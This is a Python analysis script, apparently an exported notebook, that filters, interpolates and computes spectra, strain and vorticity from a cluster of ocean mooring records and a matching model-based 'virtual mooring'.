u = cc["u"][:, sl]
v = cc["v"][:, sl]
cc["dgdz"][:, sl] = np.gradient(g, axis=1) / np.gradient(z, axis=1)
cc["dTdz"][:, sl] = np.gradient(T, axis=1) / np.gradient(z, axis=1)
cc["dudz"][:, sl] = np.gradient(u, axis=1) / np.gradient(z, axis=1)
cc["dvdz"][:, sl] = np.gradient(v, axis=1) / np.gradient(z, axis=1)
print("Filtering data.")
# Low pass filter data.
tc = tc_hrs * 60.0 * 60.0
fc = 1.0 / tc # Cut off frequency.
normal_cutoff = fc * dt_sec * 2.0 # Nyquist frequency is half 1/dt.
b, a = sig.butter(4, normal_cutoff, btype="lowpass")
varl = [
"z",
"P",
"S",
"T",
"u",
"v",
"wr",
"SA",
"CT",
"gamman",
"dgdz",
"dTdz",
"dudz",
"dvdz",
] # sva
for m in moorings:
for var in varl:
try:
data = m[var].copy()
except KeyError:
continue
m[var + "_m"] = np.nanmean(data, axis=0)
# For the purpose of filtering set fill with 0 rather than nan (SW)
nans = np.isnan(data)
if nans.any():
data[nans] = 0.0
datalo = sig.filtfilt(b, a, data, axis=0)
# Then put nans back...
if nans.any():
datalo[nans] = np.nan
namelo = var + "_lo"
m[namelo] = datalo
namehi = var + "_hi"
m[namehi] = m[var] - m[namelo]
m["spd_lo"] = np.sqrt(m["u_lo"] ** 2 + m["v_lo"] ** 2)
m["angle_lo"] = ma.angle(m["u_lo"] + 1j * m["v_lo"])
m["spd_hi"] = np.sqrt(m["u_hi"] ** 2 + m["v_hi"] ** 2)
m["angle_hi"] = ma.angle(m["u_hi"] + 1j * m["v_hi"])
# %% [markdown]
# Save the raw data.
# %% ##################### SAVE RAW DATA ######################################
io.savemat(os.path.join(data_out, "C_raw.mat"), cc)
io.savemat(os.path.join(data_out, "NW_raw.mat"), nw)
io.savemat(os.path.join(data_out, "NE_raw.mat"), ne)
io.savemat(os.path.join(data_out, "SE_raw.mat"), se)
io.savemat(os.path.join(data_out, "SW_raw.mat"), sw)
# %% [markdown]
# ## Create virtual mooring 'raw'.
# %%
print("VIRTUAL MOORING")
print("Determine maximum knockdown as a function of z.")
zms = np.hstack([m["z"].max(axis=0) for m in moorings if "se" not in m["id"]])
Dzs = np.hstack(
[m["z"].min(axis=0) - m["z"].max(axis=0) for m in moorings if "se" not in m["id"]]
)
zmax_pfit = np.polyfit(zms, Dzs, 2) # Second order polynomial for max knockdown
np.save(
os.path.join(data_out, "zmax_pfit"), np.polyfit(zms, Dzs, 2), allow_pickle=False
)
# Define the knockdown model:
print("Load model data.")
mluv = xr.load_dataset("../data/mooring_locations_uv1.nc")
mluv = mluv.isel(
t=slice(0, np.argwhere(mluv.u[:, 0, 0].data == 0)[0][0])
) # Get rid of end zeros...
mluv = mluv.assign_coords(lon=mluv.lon)
mluv = mluv.assign_coords(id=["cc", "nw", "ne", "se", "sw"])
mluv["spd"] = (mluv.u ** 2 + mluv.v ** 2) ** 0.5
print("Create virtual mooring 'raw' dataset.")
savedict = {
"cc": {"id": "cc"},
"nw": {"id": "nw"},
"ne": {"id": "ne"},
"se": {"id": "se"},
"sw": {"id": "sw"},
}
mids = ["cc", "nw", "ne", "se", "sw"]
for idx, mid in enumerate(mids):
savedict[mid]["lon"] = mluv.lon[idx].data
savedict[mid]["lat"] = mluv.lat[idx].data
izs = []
for i in range(moorings[idx]["N_levels"]):
izs.append(nearidx(mluv.z, moorings[idx]["z"][:, i].max()))
spdm = mluv.spd.isel(z=izs, index=idx).mean(dim="z")
spdn = spdm / spdm.max()
zmax = mluv.z[izs]
zk = zmodel(spdn.data[:, np.newaxis], zmax.data[np.newaxis, :], zmax_pfit)
savedict[mid]["z"] = zk
savedict[mid]["t"] = np.tile(
mluv.t.data[:, np.newaxis], (1, moorings[idx]["N_levels"])
)
fu = itpl.RectBivariateSpline(mluv.t.data, -mluv.z.data, mluv.u[..., idx].data)
fv = itpl.RectBivariateSpline(mluv.t.data, -mluv.z.data, mluv.v[..., idx].data)
uk = fu(mluv.t.data[:, np.newaxis], -zk, grid=False)
vk = fv(mluv.t.data[:, np.newaxis], -zk, grid=False)
savedict[mid]["u"] = uk
savedict[mid]["v"] = vk
io.savemat("../data/virtual_mooring_raw.mat", savedict)
# %% [markdown]
# ## Create virtual mooring 'interpolated'.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
# t_start = 734494.0
# Length of time series
# max_len = N_data = 42048
# Sampling period (minutes)
dt_min = 60.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 7
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# %%
moorings = utils.loadmat("../data/virtual_mooring_raw.mat")
cc = moorings.pop("cc")
nw = moorings.pop("nw")
ne = moorings.pop("ne")
se = moorings.pop("se")
sw = moorings.pop("sw")
moorings = [cc, nw, ne, se, sw]
N_data = cc["t"].shape[0]
# %% [markdown]
# Polynomial fits first.
# %%
print("**Generating corrected data**")
# Generate corrected moorings
z = np.concatenate([m["z"].flatten() for m in moorings])
u = np.concatenate([m["u"].flatten() for m in moorings])
v = np.concatenate([m["v"].flatten() for m in moorings])
print("Calculating polynomial coefficients.")
pzu = np.polyfit(z, u, 2)
pzv = np.polyfit(z, v, 2)
# %%
# Additional height in m to add to interpolation height.
hoffset = [-25.0, 50.0, -50.0, 100.0]
pi2 = np.pi * 2.0
nfft = nperseg
levis = [(0, 1, 2, 3), (4, 5), (6, 7, 8, 9), (10, 11)]
Nclevels = len(levis)
spec_kwargs = {
"fs": 1.0 / dt_sec,
"window": window,
"nperseg": nperseg,
"nfft": nfft,
"detrend": detrend,
"axis": 0,
}
idx1 = np.arange(nperseg, N_data, nperseg // 2) # Window end index
idx0 = idx1 - nperseg # Window start index
N_windows = len(idx0)
# Initialise the place holder dictionaries.
c12w = {"N_levels": 12} # Dictionary for raw, windowed data from central mooring
c4w = {"N_levels": Nclevels} # Dictionary for processed, windowed data
c4 = {"N_levels": Nclevels} # Dictionary for processed data
# Dictionaries for raw, windowed data from outer moorings
nw5w, ne5w, se5w, sw5w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings5w = [nw5w, ne5w, se5w, sw5w]
# Dictionaries for processed, windowed data from outer moorings
nw4w, ne4w, se4w, sw4w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings4w = [nw4w, ne4w, se4w, sw4w]
# Initialised the arrays of windowed data
varr = ["t", "z", "u", "v"]
for var in varr:
c12w[var] = np.zeros((nperseg, N_windows, 12))
var4 = [
"t",
"z",
"u",
"v",
"dudx",
"dvdx",
"dudy",
"dvdy",
"dudz",
"dvdz",
"nstrain",
"sstrain",
"vort",
"div",
]
for var in var4:
c4w[var] = np.zeros((nperseg, N_windows, Nclevels))
for var in var4:
c4[var] = np.zeros((N_windows, Nclevels))
# Initialised the arrays of windowed data for outer mooring
varro = ["z", "u", "v"]
for var in varro:
for m5w in moorings5w:
m5w[var] = np.zeros((nperseg, N_windows, 5))
var4o = ["z", "u", "v"]
for var in var4o:
for m4w in moorings4w:
m4w[var] = np.zeros((nperseg, N_windows, Nclevels))
# for var in var4o:
# for m4 in moorings4:
# m4[var] = np.zeros((N_windows, 4))
# Window the raw data.
for i in range(N_windows):
idx = idx0[i]
for var in varr:
c12w[var][:, i, :] = cc[var][idx : idx + nperseg, :]
for i in range(N_windows):
idx = idx0[i]
for var in varro:
for m5w, m in zip(moorings5w, moorings[1:]):
m5w[var][:, i, :] = m[var][idx : idx + nperseg, :]
print("Interpolating properties.")
# Do the interpolation
for i in range(Nclevels):
# THIS hoffset is important!!!
c4["z"][:, i] = np.mean(c12w["z"][..., levis[i]], axis=(0, -1)) + hoffset[i]
for j in range(N_windows):
zr = c12w["z"][:, j, levis[i]]
ur = c12w["u"][:, j, levis[i]]
vr = c12w["v"][:, j, levis[i]]
zi = c4["z"][j, i]
c4w["z"][:, j, i] = np.mean(zr, axis=-1)
c4w["t"][:, j, i] = c12w["t"][:, j, 0]
c4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
c4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
dudzr = np.gradient(ur, axis=-1) / np.gradient(zr, axis=-1)
dvdzr = np.gradient(vr, axis=-1) / np.gradient(zr, axis=-1)
# Instead of mean, could moo.interp1d
c4w["dudz"][:, j, i] = np.mean(dudzr, axis=-1)
c4w["dvdz"][:, j, i] = np.mean(dvdzr, axis=-1)
for m5w, m4w in zip(moorings5w, moorings4w):
zr = m5w["z"][:, j, :]
ur = m5w["u"][:, j, :]
vr = m5w["v"][:, j, :]
m4w["z"][:, j, i] = np.full((nperseg), zi)
m4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
m4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
print("Filtering windowed data.")
fcorcpd = np.abs(gsw.f(cc["lat"])) * 86400 / pi2
varl = ["u", "v"]
for var in varl:
c4w[var + "_lo"] = utils.butter_filter(
c4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
c4w[var + "_hi"] = c4w[var] - c4w[var + "_lo"]
varl = ["u", "v"]
for var in varl:
for m4w in moorings4w:
m4w[var + "_lo"] = utils.butter_filter(
m4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
m4w[var + "_hi"] = m4w[var] - m4w[var + "_lo"]
c4w["zi"] = np.ones_like(c4w["z"]) * c4["z"]
print("Calculating horizontal gradients.")
# Calculate horizontal gradients
for j in range(N_windows):
ll = np.stack(
([m["lon"] for m in moorings[1:]], [m["lat"] for m in moorings[1:]]), axis=1
)
uv = np.stack(
(
[m4w["u_lo"][:, j, :] for m4w in moorings4w],
[m4w["v_lo"][:, j, :] for m4w in moorings4w],
),
axis=1,
)
dudx, dudy, dvdx, dvdy, vort, div = moo.div_vort_4D(ll[:, 0], ll[:, 1], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
c4w["dudx"][:, j, :] = dudx
c4w["dudy"][:, j, :] = dudy
c4w["dvdx"][:, j, :] = dvdx
c4w["dvdy"][:, j, :] = dvdy
c4w["nstrain"][:, j, :] = nstrain
c4w["sstrain"][:, j, :] = sstrain
c4w["vort"][:, j, :] = vort
c4w["div"][:, j, :] = div
for var in var4:
if var == "z": # Keep z as modified by hoffset.
continue
c4[var] = np.mean(c4w[var], axis=0)
freq, c4w["Puu"] = sig.welch(c4w["u_hi"], **spec_kwargs)
_, c4w["Pvv"] = sig.welch(c4w["v_hi"], **spec_kwargs)
_, c4w["Cuv"] = sig.csd(c4w["u_hi"], c4w["v_hi"], **spec_kwargs)
c4w["freq"] = freq.copy()
# Get rid of annoying tiny values.
svarl = ["Puu", "Pvv", "Cuv"]
for var in svarl:
c4w[var][0, ...] = 0.0
c4[var + "_int"] = np.full((N_windows, 4), np.nan)
# Horizontal azimuth according to Jing 2018
c4w["theta"] = np.arctan2(2.0 * c4w["Cuv"].real, (c4w["Puu"] - c4w["Pvv"])) / 2
# Integration #############################################################
print("Integrating power spectra.")
for var in svarl:
c4w[var + "_cint"] = np.full_like(c4w[var], fill_value=np.nan)
fcor = np.abs(gsw.f(cc["lat"])) / pi2
N_freq = len(freq)
freq_ = np.tile(freq[:, np.newaxis, np.newaxis], (1, N_windows, Nclevels))
# ulim = fhi * np.tile(c4["N"][np.newaxis, ...], (N_freq, 1, 1)) / pi2
ulim = 1e9 # Set a huge upper limit since we don't know what N is...
llim = fcor * flo
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Puu", "Pvv", "Cuv"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Change lower integration limits for vertical components...
llim = fcor * flov
use = (freq_ < ulim) & (freq_ > llim)
# Usefull quantities
c4["nstress"] = c4["Puu_int"] - c4["Pvv_int"]
c4["sstress"] = -2.0 * c4["Cuv_int"]
c4["F_horiz"] = (
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]) * c4["nstrain"]
- c4["Cuv_int"] * c4["sstrain"]
)
# ## Now we have to create the model 'truth'...
#
# Load the model data and estimate some gradients.
print("Estimating smoothed gradients (slow).")
mluv = xr.load_dataset("../data/mooring_locations_uv1.nc")
mluv = mluv.isel(
t=slice(0, np.argwhere(mluv.u[:, 0, 0].data == 0)[0][0])
) # Get rid of end zeros...
mluv = mluv.assign_coords(lon=mluv.lon)
mluv = mluv.assign_coords(id=["cc", "nw", "ne", "se", "sw"])
mluv["dudz"] = (["t", "z", "index"], np.gradient(mluv.u, mluv.z, axis=1))
mluv["dvdz"] = (["t", "z", "index"], np.gradient(mluv.v, mluv.z, axis=1))
uv = np.rollaxis(np.stack((mluv.u, mluv.v))[..., 1:], 3, 0)
dudx, dudy, dvdx, dvdy, vort, div = moo.div_vort_4D(mluv.lon[1:], mluv.lat[1:], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
mluv["dudx"] = (["t", "z"], dudx)
mluv["dudy"] = (["t", "z"], dudy)
mluv["dvdx"] = (["t", "z"], dvdx)
mluv["dvdy"] = (["t", "z"], dvdy)
mluv["nstrain"] = (["t", "z"], nstrain)
mluv["sstrain"] = (["t", "z"], sstrain)
mluv["vort"] = (["t", "z"], vort)
mluv["div"] = (["t", "z"], div)
# Smooth the model data in an equivalent way to the real mooring.
dudxs = (
mluv.dudx.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdxs = (
mluv.dvdx.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dudys = (
mluv.dudy.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdys = (
mluv.dvdy.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
sstrains = (
mluv.sstrain.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
nstrains = (
mluv.nstrain.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
divs = (
mluv.div.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
vorts = (
mluv.vort.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dudzs = (
mluv.dudz.isel(index=0)
.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdzs = (
mluv.dvdz.isel(index=0)
.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
# Make spline fits.
fdudx = itpl.RectBivariateSpline(dudxs.t.data, -dudxs.z.data, dudxs.data)
fdvdx = itpl.RectBivariateSpline(dvdxs.t.data, -dvdxs.z.data, dvdxs.data)
fdudy = itpl.RectBivariateSpline(dudys.t.data, -dudys.z.data, dudys.data)
fdvdy = itpl.RectBivariateSpline(dvdys.t.data, -dvdys.z.data, dvdys.data)
fsstrain = itpl.RectBivariateSpline(sstrains.t.data, -sstrains.z.data, sstrains.data)
fnstrain = itpl.RectBivariateSpline(nstrains.t.data, -nstrains.z.data, nstrains.data)
fdiv = itpl.RectBivariateSpline(divs.t.data, -divs.z.data, divs.data)
fvort = itpl.RectBivariateSpline(vorts.t.data, -vorts.z.data, vorts.data)
fdudz = itpl.RectBivariateSpline(dudzs.t.data, -dudzs.z.data, dudzs.data)
fdvdz = itpl.RectBivariateSpline(dvdzs.t.data, -dvdzs.z.data, dvdzs.data)
# Interpolate using splines.
dudxt = fdudx(c4["t"], -c4["z"], grid=False)
dvdxt = fdvdx(c4["t"], -c4["z"], grid=False)
dudyt = fdudy(c4["t"], -c4["z"], grid=False)
dvdyt = fdvdy(c4["t"], -c4["z"], grid=False)
sstraint = fsstrain(c4["t"], -c4["z"], grid=False)
nstraint = fnstrain(c4["t"], -c4["z"], grid=False)
divt = fdiv(c4["t"], -c4["z"], grid=False)
vortt = fvort(c4["t"], -c4["z"], grid=False)
dudzt = fdudz(c4["t"], -c4["z"], grid=False)
dvdzt = fdvdz(c4["t"], -c4["z"], grid=False)
c4["dudxt"] = dudxt
c4["dvdxt"] = dvdxt
c4["dudyt"] = dudyt
c4["dvdyt"] = dvdyt
c4["sstraint"] = sstraint
c4["nstraint"] = nstraint
c4["divt"] = divt
c4["vortt"] = vortt
c4["dudzt"] = dudzt
c4["dvdzt"] = dvdzt
# %%
# %% ########################## SAVE CORRECTED FILES ##########################
io.savemat("../data/virtual_mooring_interpolated.mat", c4)
io.savemat("../data/virtual_mooring_interpolated_windowed.mat", c4w)
# %% [markdown]
# Signal to noise ratios.
# %%
print("Estimating signal to noise ratios.")
M = munch.munchify(utils.loadmat('../data/virtual_mooring_interpolated.mat'))
# shear strain
dsstrain = M.sstrain - M.sstraint
SNR_sstrain = M.sstrain.var(axis=0)/dsstrain.var(axis=0)
np.save('../data/SNR_sstrain', SNR_sstrain, allow_pickle=False)
# normal strain
dnstrain = M.nstrain - M.nstraint
SNR_nstrain = M.nstrain.var(axis=0)/dnstrain.var(axis=0)
np.save('../data/SNR_nstrain', SNR_nstrain, allow_pickle=False)
# zonal shear
ddudz = M.dudz - M.dudzt
SNR_dudz = M.dvdz.var(axis=0)/ddudz.var(axis=0)
np.save('../data/SNR_dudz', SNR_dudz, allow_pickle=False)
# meridional shear
ddvdz = M.dvdz - M.dvdzt
SNR_dvdz = M.dvdz.var(axis=0)/ddvdz.var(axis=0)
np.save('../data/SNR_dvdz', SNR_dvdz, allow_pickle=False)
# divergence
ddiv = M.div - M.divt
SNR_nstrain = M.div.var(axis=0)/ddiv.var(axis=0)
np.save('../data/SNR_div', SNR_nstrain, allow_pickle=False)
# %% [markdown]
# <a id="corrected"></a>
# %% [markdown]
# ## Generate interpolated data.
#
# Set parameters again.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
t_start = 734494.0
# Length of time series
max_len = N_data = 42048
# Data file
raw_data_file = "moorings.mat"
# Index where NaNs start in u and v data from SW mooring
sw_vel_nans = 14027
# Sampling period (minutes)
dt_min = 15.0
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 9
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# When bandpass filtering windowed data use these params multiplied by f and N
filtlo = 0.9 # times f
filthi = 1.1 # times N
# Interpolation distance that raises flag (m)
zimax = 100.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# %% [markdown]
# Polynomial fits first.
# %%
print("REAL MOORING INTERPOLATION")
print("**Generating corrected data**")
moorings = load_data.load_my_data()
cc, nw, ne, se, sw = moorings
# Generate corrected moorings
T = np.concatenate([m["T"].flatten() for m in moorings])
S = np.concatenate([m["S"].flatten() for m in moorings])
z = np.concatenate([m["z"].flatten() for m in moorings])
u = np.concatenate([m["u"].flatten() for m in moorings])
v = np.concatenate([m["v"].flatten() for m in moorings])
g = np.concatenate([m["gamman"].flatten() for m in moorings])
# SW problems...
nans = np.isnan(u) | np.isnan(v)
print("Calculating polynomial coefficients.")
pzT = np.polyfit(z[~nans], T[~nans], 3)
pzS = np.polyfit(z[~nans], S[~nans], 3)
pzg = np.polyfit(z[~nans], g[~nans], 3)
pzu = np.polyfit(z[~nans], u[~nans], 2)
pzv = np.polyfit(z[~nans], v[~nans], 2)
# %%
# Additional height in m to add to interpolation height.
hoffset = [-25.0, 50.0, -50.0, 100.0]
pi2 = np.pi * 2.0
nfft = nperseg
levis = [(0, 1, 2, 3), (4, 5), (6, 7, 8, 9), (10, 11)]
Nclevels = len(levis)
spec_kwargs = {
"fs": 1.0 / dt_sec,
"window": window,
"nperseg": nperseg,
"nfft": nfft,
"detrend": detrend,
"axis": 0,
}
idx1 = np.arange(nperseg, N_data, nperseg // 2) # Window end index
idx0 = idx1 - nperseg # Window start index
N_windows = len(idx0)
# Initialise the place holder dictionaries.
c12w = {"N_levels": 12} # Dictionary for raw, windowed data from central mooring
c4w = {"N_levels": Nclevels} # Dictionary for processed, windowed data
c4 = {"N_levels": Nclevels} # Dictionary for processed data
# Dictionaries for raw, windowed data from outer moorings
nw5w, ne5w, se5w, sw5w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings5w = [nw5w, ne5w, se5w, sw5w]
# Dictionaries for processed, windowed data from outer moorings
nw4w, ne4w, se4w, sw4w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings4w = [nw4w, ne4w, se4w, sw4w]
# Initialised the arrays of windowed data
varr = ["t", "z", "u", "v", "gamman", "S", "T", "P"]
for var in varr:
c12w[var] = np.zeros((nperseg, N_windows, cc["N_levels"]))
var4 = [
"t",
"z",
"u",
"v",
"gamman",
"dudx",
"dvdx",
"dudy",
"dvdy",
"dudz",
"dvdz",
"dgdz",
"nstrain",
"sstrain",
"vort",
"N2",
]
for var in var4:
c4w[var] = np.zeros((nperseg, N_windows, Nclevels))
for var in var4:
c4[var] = np.zeros((N_windows, Nclevels))
# Initialised the arrays of windowed data for outer mooring
varro = ["z", "u", "v"]
for var in varro:
for m5w in moorings5w:
m5w[var] = np.zeros((nperseg, N_windows, 5))
var4o = ["z", "u", "v"]
for var in var4o:
for m4w in moorings4w:
m4w[var] = np.zeros((nperseg, N_windows, Nclevels))
# for var in var4o:
# for m4 in moorings4:
# m4[var] = np.zeros((N_windows, 4))
# Window the raw data.
for i in range(N_windows):
idx = idx0[i]
for var in varr:
c12w[var][:, i, :] = cc[var][idx : idx + nperseg, :]
for i in range(N_windows):
idx = idx0[i]
for var in varro:
for m5w, m in zip(moorings5w, moorings[1:]):
m5w[var][:, i, :] = m[var][idx : idx + nperseg, :]
c4["interp_far_flag"] = np.full_like(c4["u"], False, dtype=bool)
print("Interpolating properties.")
# Do the interpolation
for i in range(Nclevels):
# THIS hoffset is important!!!
c4["z"][:, i] = np.mean(c12w["z"][..., levis[i]], axis=(0, -1)) + hoffset[i]
for j in range(N_windows):
zr = c12w["z"][:, j, levis[i]]
ur = c12w["u"][:, j, levis[i]]
vr = c12w["v"][:, j, levis[i]]
gr = c12w["gamman"][:, j, levis[i]]
Sr = c12w["S"][:, j, levis[i]]
Tr = c12w["T"][:, j, levis[i]]
Pr = c12w["P"][:, j, levis[i]]
zi = c4["z"][j, i]
c4["interp_far_flag"][j, i] = np.any(np.min(np.abs(zr - zi), axis=-1) > zimax)
c4w["z"][:, j, i] = np.mean(zr, axis=-1)
c4w["t"][:, j, i] = c12w["t"][:, j, 0]
c4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
c4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
c4w["gamman"][:, j, i] = moo.interp_quantity(zr, gr, zi, pzg)
dudzr = np.gradient(ur, axis=-1) / np.gradient(zr, axis=-1)
dvdzr = np.gradient(vr, axis=-1) / np.gradient(zr, axis=-1)
dgdzr = np.gradient(gr, axis=-1) / np.gradient(zr, axis=-1)
N2 = seawater.bfrq(Sr.T, Tr.T, Pr.T, cc["lat"])[0].T
# Instead of mean, could moo.interp1d
c4w["dudz"][:, j, i] = np.mean(dudzr, axis=-1)
c4w["dvdz"][:, j, i] = np.mean(dvdzr, axis=-1)
c4w["dgdz"][:, j, i] = np.mean(dgdzr, axis=-1)
c4w["N2"][:, j, i] = np.mean(N2, axis=-1)
for m5w, m4w in zip(moorings5w, moorings4w):
if (m5w["id"] == "sw") & (
idx1[j] > sw_vel_nans
): # Skip this level because of NaNs
zr = m5w["z"][:, j, (0, 1, 3, 4)]
ur = m5w["u"][:, j, (0, 1, 3, 4)]
vr = m5w["v"][:, j, (0, 1, 3, 4)]
else:
zr = m5w["z"][:, j, :]
ur = m5w["u"][:, j, :]
vr = m5w["v"][:, j, :]
m4w["z"][:, j, i] = np.full((nperseg), zi)
m4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
m4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
print("Filtering windowed data.")
fcorcpd = np.abs(cc["f"]) * 86400 / pi2
Nmean = np.sqrt(np.average(c4w["N2"], weights=sig.hann(nperseg), axis=0))
varl = ["u", "v", "gamman"]
for var in varl:
c4w[var + "_hib"] = np.zeros_like(c4w[var])
c4w[var + "_lo"] = utils.butter_filter(
c4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
c4w[var + "_hi"] = c4w[var] - c4w[var + "_lo"]
for i in range(Nclevels):
for j in range(N_windows):
Nmean_ = Nmean[j, i] * 86400 / pi2
for var in varl:
c4w[var + "_hib"][:, j, i] = utils.butter_filter(
c4w[var][:, j, i],
(filtlo * fcorcpd, filthi * Nmean_),
fs=N_per_day,
btype="band",
)
varl = ["u", "v"]
for var in varl:
for m4w in moorings4w:
m4w[var + "_lo"] = utils.butter_filter(
m4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
m4w[var + "_hi"] = m4w[var] - m4w[var + "_lo"]
c4w["zi"] = np.ones_like(c4w["z"]) * c4["z"]
print("Calculating horizontal gradients.")
# Calculate horizontal gradients
for j in range(N_windows):
ll = np.stack(
([m["lon"] for m in moorings[1:]], [m["lat"] for m in moorings[1:]]), axis=1
)
uv = np.stack(
(
[m4w["u_lo"][:, j, :] for m4w in moorings4w],
[m4w["v_lo"][:, j, :] for m4w in moorings4w],
),
axis=1,
)
dudx, dudy, dvdx, dvdy, vort, _ = moo.div_vort_4D(ll[:, 0], ll[:, 1], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
c4w["dudx"][:, j, :] = dudx
c4w["dudy"][:, j, :] = dudy
c4w["dvdx"][:, j, :] = dvdx
c4w["dvdy"][:, j, :] = dvdy
c4w["nstrain"][:, j, :] = nstrain
c4w["sstrain"][:, j, :] = sstrain
c4w["vort"][:, j, :] = vort
print("Calculating window averages.")
for var in var4 + ["u_lo", "v_lo", "gamman_lo"]:
if var == "z": # Keep z as modified by hoffset.
continue
c4[var] = np.average(c4w[var], weights=sig.hann(nperseg), axis=0)
print("Estimating w and b.")
om = np.fft.fftfreq(nperseg, 15 * 60)
c4w["w_hi"] = np.fft.ifft(
1j
* pi2
* om[:, np.newaxis, np.newaxis]
* np.fft.fft(-c4w["gamman_hi"] / c4["dgdz"], axis=0),
axis=0,
).real
c4w["w_hib"] = np.fft.ifft(
1j
* pi2
* om[:, np.newaxis, np.newaxis]
* np.fft.fft(-c4w["gamman_hib"] / c4["dgdz"], axis=0),
axis=0,
).real
# Estimate buoyancy variables
c4w["b_hi"] = -gsw.grav(-c4["z"], cc["lat"]) * c4w["gamman_hi"] / c4["gamman_lo"]
c4w["b_hib"] = -gsw.grav(-c4["z"], cc["lat"]) * c4w["gamman_hib"] / c4["gamman_lo"]
c4["N"] = np.sqrt(c4["N2"])
print("Estimating covariance spectra.")
freq, c4w["Puu"] = sig.welch(c4w["u_hi"], **spec_kwargs)
_, c4w["Pvv"] = sig.welch(c4w["v_hi"], **spec_kwargs)
_, c4w["Pww"] = sig.welch(c4w["w_hi"], **spec_kwargs)
_, c4w["Pwwg"] = sig.welch(c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Pwwg"] *= (pi2 * freq[:, np.newaxis, np.newaxis]) ** 2
_, c4w["Pbb"] = sig.welch(c4w["b_hi"], **spec_kwargs)
_, c4w["Cuv"] = sig.csd(c4w["u_hi"], c4w["v_hi"], **spec_kwargs)
_, c4w["Cuwg"] = sig.csd(c4w["u_hi"], c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Cuwg"] *= -1j * pi2 * freq[:, np.newaxis, np.newaxis]
_, c4w["Cvwg"] = sig.csd(c4w["v_hi"], c4w["gamman_hi"] / c4["dgdz"], **spec_kwargs)
c4w["Cvwg"] *= -1j * pi2 * freq[:, np.newaxis, np.newaxis]
_, c4w["Cub"] = sig.csd(c4w["u_hi"], c4w["b_hi"], **spec_kwargs)
_, c4w["Cvb"] = sig.csd(c4w["v_hi"], c4w["b_hi"], **spec_kwargs)
print("Estimating covariance matrices.")
c4["couu"] = cov(c4w["u_hib"], c4w["u_hib"], axis=0)
c4["covv"] = cov(c4w["v_hib"], c4w["v_hib"], axis=0)
c4["coww"] = cov(c4w["w_hib"], c4w["w_hib"], axis=0)
c4["cobb"] = cov(c4w["b_hib"], c4w["b_hib"], axis=0)
c4["couv"] = cov(c4w["u_hib"], c4w["v_hib"], axis=0)
c4["couw"] = cov(c4w["u_hib"], c4w["w_hib"], axis=0)
c4["covw"] = cov(c4w["v_hib"], c4w["w_hib"], axis=0)
c4["coub"] = cov(c4w["u_hib"], c4w["b_hib"], axis=0)
c4["covb"] = cov(c4w["v_hib"], c4w["b_hib"], axis=0)
c4w["freq"] = freq.copy()
